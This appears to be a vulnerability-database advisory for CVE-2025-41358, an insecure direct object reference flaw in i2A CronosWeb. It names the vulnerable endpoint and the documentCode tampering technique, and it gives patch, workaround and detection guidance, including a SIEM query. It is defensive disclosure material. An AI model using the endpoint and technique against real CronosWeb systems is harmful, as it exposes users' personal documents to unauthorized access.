CVE-2025-41358
📋 TL;DR
This IDOR vulnerability in i2A's CronosWeb allows authenticated attackers to access other users' personal documents by manipulating the documentCode parameter. It affects all CronosWeb versions prior to 25.00.00.12. Any organization using vulnerable CronosWeb instances is at risk of data exposure.
💻 Affected Systems
- i2A CronosWeb
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Mass exfiltration of sensitive personal documents including identification, financial records, and confidential employee information, potentially leading to identity theft, regulatory violations, and reputational damage.
Likely Case
Targeted access to specific users' documents for espionage, blackmail, or unauthorized information gathering by malicious insiders or compromised accounts.
If Mitigated
Limited exposure if proper access controls, monitoring, and network segmentation are implemented, though the vulnerability still exists.
🎯 Exploit Status
Simple parameter manipulation attack requiring only authenticated access to the web interface.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 25.00.00.12 or later
Vendor Advisory: https://www.incibe.es/en/incibe-cert/notices/aviso/direct-reference-insecure-objects-idor-cronosweb-cronosweb-i2a
Restart Required: Yes
Instructions:
1. Download CronosWeb version 25.00.00.12 or later from i2A. 2. Backup current installation and database. 3. Apply the update following i2A's installation guide. 4. Restart the CronosWeb service. 5. Verify the fix by testing document access controls.
🔧 Temporary Workarounds
Web Application Firewall (WAF) Rule
allBlock or alert on suspicious documentCode parameter patterns in requests to the vulnerable endpoint.
WAF-specific configuration required
Access Restriction
allRestrict access to /CronosWeb/Modulos/Personas/DocumentosPersonales/AdjuntarDocumentosPersonas endpoint to only authorized personnel.
Firewall/load balancer configuration required
🧯 If You Can't Patch
- Implement strict access controls and monitoring on the vulnerable endpoint
- Deploy additional authentication/authorization layer before the vulnerable functionality
🔍 How to Verify
Check if Vulnerable:
Test if authenticated user can access another user's documents by modifying documentCode parameter in requests to /CronosWeb/Modulos/Personas/DocumentosPersonales/AdjuntarDocumentosPersonasCheck Version:
Check CronosWeb version in application interface or configuration filesVerify Fix Applied:
After patching, verify that documentCode parameter manipulation no longer allows access to unauthorized documents📡 Detection & Monitoring
Log Indicators:
- Multiple failed document access attempts
- Rapid sequential access to different documentCodes from same user
- Access to documentCodes outside user's normal range
Network Indicators:
- Unusual patterns of requests to the vulnerable endpoint
- Parameter tampering in documentCode values
SIEM Query:
source="cronosweb" AND (uri_path="/CronosWeb/Modulos/Personas/DocumentosPersonales/AdjuntarDocumentosPersonas") AND (documentCode variations detected)